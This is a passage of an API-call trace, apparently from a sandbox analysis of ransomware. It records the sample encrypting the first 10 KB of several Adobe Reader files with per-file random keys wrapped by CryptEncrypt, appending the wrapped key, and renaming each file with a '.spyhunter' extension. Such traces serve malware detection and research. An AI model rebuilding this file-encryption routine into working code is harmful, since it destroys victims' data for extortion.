dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.754] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.754] WriteFile (in: hFile=0xf4, lpBuffer=0x248f91c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8dc, lpOverlapped=0x0 | out: lpBuffer=0x248f91c*, lpNumberOfBytesWritten=0x248f8dc*=0x4, lpOverlapped=0x0) returned 1 [0118.755] WriteFile (in: hFile=0xf4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8dc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8dc*=0x30, lpOverlapped=0x0) returned 1 [0118.755] CloseHandle (hObject=0xf4) returned 1 [0118.755] GetProcessHeap () returned 0x2c0000 [0118.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0118.755] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.SVE.spyhunter") returned 96 [0118.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.sve"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.SVE.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.sve.spyhunter")) returned 1 [0118.756] GetProcessHeap () returned 0x2c0000 [0118.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0118.756] GetProcessHeap () returned 0x2c0000 [0118.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0118.756] GetProcessHeap () returned 0x2c0000 [0118.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4ae00 | out: hHeap=0x2c0000) returned 1 [0118.756] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f920 | out: pbBuffer=0x248f920) returned 1 [0118.756] GetProcessHeap () returned 0x2c0000 [0118.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0118.756] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f918*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f918*=0x30) returned 1 [0118.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\weblink.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\weblink.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0118.758] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\weblink.api") returned 72 [0118.758] StrStrW (lpFirst="weblink.api", lpSrch=".txt") returned 0x0 [0118.758] GetProcessHeap () returned 0x2c0000 [0118.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0118.758] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f8dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.764] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.764] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f8dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.764] GetProcessHeap () returned 0x2c0000 [0118.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.764] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.765] WriteFile (in: hFile=0xf4, lpBuffer=0x248f91c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8dc, lpOverlapped=0x0 | out: lpBuffer=0x248f91c*, lpNumberOfBytesWritten=0x248f8dc*=0x4, lpOverlapped=0x0) returned 1 [0118.791] WriteFile (in: hFile=0xf4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8dc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8dc*=0x30, lpOverlapped=0x0) returned 1 [0118.791] CloseHandle (hObject=0xf4) returned 1 [0118.791] GetProcessHeap () returned 0x2c0000 [0118.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0118.791] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\weblink.api.spyhunter") returned 82 [0118.791] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\weblink.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\weblink.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\weblink.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\weblink.api.spyhunter")) returned 1 [0118.792] GetProcessHeap () returned 0x2c0000 [0118.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0118.792] GetProcessHeap () returned 0x2c0000 [0118.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0118.792] GetProcessHeap () returned 0x2c0000 [0118.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e446e8 | out: hHeap=0x2c0000) returned 1 [0118.793] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f918 | out: pbBuffer=0x248f918) returned 1 [0118.793] GetProcessHeap () returned 0x2c0000 [0118.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0118.793] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f910*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f910*=0x30) returned 1 [0118.793] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SendMail.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\sendmail.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0118.793] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SendMail.api") returned 73 [0118.794] StrStrW (lpFirst="SendMail.api", lpSrch=".txt") returned 0x0 [0118.794] GetProcessHeap () returned 0x2c0000 [0118.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0118.794] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f8d4*=0x2800, lpOverlapped=0x0) returned 1 [0118.924] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.924] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f8d4*=0x2800, lpOverlapped=0x0) returned 1 [0118.924] GetProcessHeap () returned 0x2c0000 [0118.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0118.924] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.924] WriteFile (in: hFile=0xf4, lpBuffer=0x248f914*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8d4, lpOverlapped=0x0 | out: lpBuffer=0x248f914*, lpNumberOfBytesWritten=0x248f8d4*=0x4, lpOverlapped=0x0) returned 1 [0119.001] WriteFile (in: hFile=0xf4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8d4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8d4*=0x30, lpOverlapped=0x0) returned 1 [0119.002] CloseHandle (hObject=0xf4) returned 1 [0119.002] GetProcessHeap () returned 0x2c0000 [0119.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0119.002] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SendMail.api.spyhunter") returned 83 [0119.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SendMail.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\sendmail.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SendMail.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\sendmail.api.spyhunter")) returned 1 [0119.003] GetProcessHeap () returned 0x2c0000 [0119.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0119.003] GetProcessHeap () returned 0x2c0000 [0119.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0119.003] GetProcessHeap () returned 0x2c0000 [0119.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e438e8 | out: hHeap=0x2c0000) returned 1 [0119.003] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f918 | out: pbBuffer=0x248f918) returned 1 [0119.003] GetProcessHeap () returned 0x2c0000 [0119.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0119.003] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f910*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f910*=0x30) returned 1 [0119.003] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX8.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx8.x3d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0119.031] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX8.x3d") returned 73 [0119.031] StrStrW (lpFirst="drvDX8.x3d", lpSrch=".txt") returned 0x0 [0119.031] GetProcessHeap () returned 0x2c0000 [0119.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0119.031] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f8d4*=0x2800, lpOverlapped=0x0) returned 1 [0119.056] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.056] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f8d4*=0x2800, lpOverlapped=0x0) returned 1 [0119.057] GetProcessHeap () returned 0x2c0000 [0119.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0119.057] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.057] WriteFile (in: hFile=0x17c, lpBuffer=0x248f914*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8d4, lpOverlapped=0x0 | out: lpBuffer=0x248f914*, lpNumberOfBytesWritten=0x248f8d4*=0x4, lpOverlapped=0x0) returned 1 [0119.063] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8d4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8d4*=0x30, lpOverlapped=0x0) returned 1 [0119.064] CloseHandle (hObject=0x17c) returned 1 [0119.064] GetProcessHeap () returned 0x2c0000 [0119.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.065] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX8.x3d.spyhunter") returned 83 [0119.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX8.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx8.x3d"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX8.x3d.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx8.x3d.spyhunter")) returned 1 [0119.067] GetProcessHeap () returned 0x2c0000 [0119.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.068] GetProcessHeap () returned 0x2c0000 [0119.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0119.068] GetProcessHeap () returned 0x2c0000 [0119.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44608 | out: hHeap=0x2c0000) returned 1 [0119.068] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f910 | out: pbBuffer=0x248f910) returned 1 [0119.068] GetProcessHeap () returned 0x2c0000 [0119.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0119.069] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f908*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f908*=0x30) returned 1 [0119.069] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\sqlite.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\sqlite.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0119.083] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\sqlite.dll") returned 62 [0119.083] StrStrW (lpFirst="sqlite.dll", lpSrch=".txt") returned 0x0 [0119.083] GetProcessHeap () returned 0x2c0000 [0119.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0119.084] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f8cc*=0x2800, lpOverlapped=0x0) returned 1 [0119.178] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.178] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f8cc*=0x2800, lpOverlapped=0x0) returned 1 [0119.178] GetProcessHeap () returned 0x2c0000 [0119.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0119.178] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.178] WriteFile (in: hFile=0x17c, lpBuffer=0x248f90c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8cc, lpOverlapped=0x0 | out: lpBuffer=0x248f90c*, lpNumberOfBytesWritten=0x248f8cc*=0x4, lpOverlapped=0x0) returned 1 [0119.194] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8cc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8cc*=0x30, lpOverlapped=0x0) returned 1 [0119.194] CloseHandle (hObject=0x17c) returned 1 [0119.194] GetProcessHeap () returned 0x2c0000 [0119.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.194] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\sqlite.dll.spyhunter") returned 72 [0119.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\sqlite.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\sqlite.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\sqlite.dll.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\sqlite.dll.spyhunter")) returned 1 [0119.195] GetProcessHeap () returned 0x2c0000 [0119.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.195] GetProcessHeap () returned 0x2c0000 [0119.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0119.195] GetProcessHeap () returned 0x2c0000 [0119.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf498 | out: hHeap=0x2c0000) returned 1 [0119.196] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f910 | out: pbBuffer=0x248f910) returned 1 [0119.196] GetProcessHeap () returned 0x2c0000 [0119.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0119.196] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f908*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f908*=0x30) returned 1 [0119.196] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\rt3d.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\rt3d.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0119.197] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\rt3d.dll") returned 60 [0119.198] StrStrW (lpFirst="rt3d.dll", lpSrch=".txt") returned 0x0 [0119.198] GetProcessHeap () returned 0x2c0000 [0119.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0119.198] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f8cc*=0x2800, lpOverlapped=0x0) returned 1 [0119.256] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.256] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f8cc*=0x2800, lpOverlapped=0x0) returned 1 [0119.257] GetProcessHeap () returned 0x2c0000 [0119.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0119.257] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.257] WriteFile (in: hFile=0x17c, lpBuffer=0x248f90c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8cc, lpOverlapped=0x0 | out: lpBuffer=0x248f90c*, lpNumberOfBytesWritten=0x248f8cc*=0x4, lpOverlapped=0x0) returned 1 [0119.274] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8cc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8cc*=0x30, lpOverlapped=0x0) returned 1 [0119.275] CloseHandle (hObject=0x17c) returned 1 [0119.275] GetProcessHeap () returned 0x2c0000 [0119.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0119.275] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\rt3d.dll.spyhunter") returned 70 [0119.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\rt3d.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\rt3d.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\rt3d.dll.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\rt3d.dll.spyhunter")) returned 1 [0119.276] GetProcessHeap () returned 0x2c0000 [0119.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0119.276] GetProcessHeap () returned 0x2c0000 [0119.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0119.276] GetProcessHeap () returned 0x2c0000 [0119.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf308 | out: hHeap=0x2c0000) returned 1 [0119.277] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f908 | out: pbBuffer=0x248f908) returned 1 [0119.277] GetProcessHeap () returned 0x2c0000 [0119.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0119.277] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f900*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f900*=0x30) returned 1 [0119.277] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0119.277] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm") returned 58 [0119.278] StrStrW (lpFirst="ReadMeRUM.htm", lpSrch=".txt") returned 0x0 [0119.278] GetProcessHeap () returned 0x2c0000 [0119.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0119.278] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f8c4*=0x2800, lpOverlapped=0x0) returned 1 [0119.458] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.458] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f8c4*=0x2800, lpOverlapped=0x0) returned 1 [0119.459] GetProcessHeap () returned 0x2c0000 [0119.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0119.459] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.459] WriteFile (in: hFile=0x17c, lpBuffer=0x248f904*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8c4, lpOverlapped=0x0 | out: lpBuffer=0x248f904*, lpNumberOfBytesWritten=0x248f8c4*=0x4, lpOverlapped=0x0) returned 1 [0119.635] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8c4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8c4*=0x30, lpOverlapped=0x0) returned 1 [0119.635] CloseHandle (hObject=0x17c) returned 1 [0119.635] GetProcessHeap () returned 0x2c0000 [0119.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.635] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm.spyhunter") returned 68 [0119.635] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm"), lpNewFileName="\\\\?\\C:\\Program Files 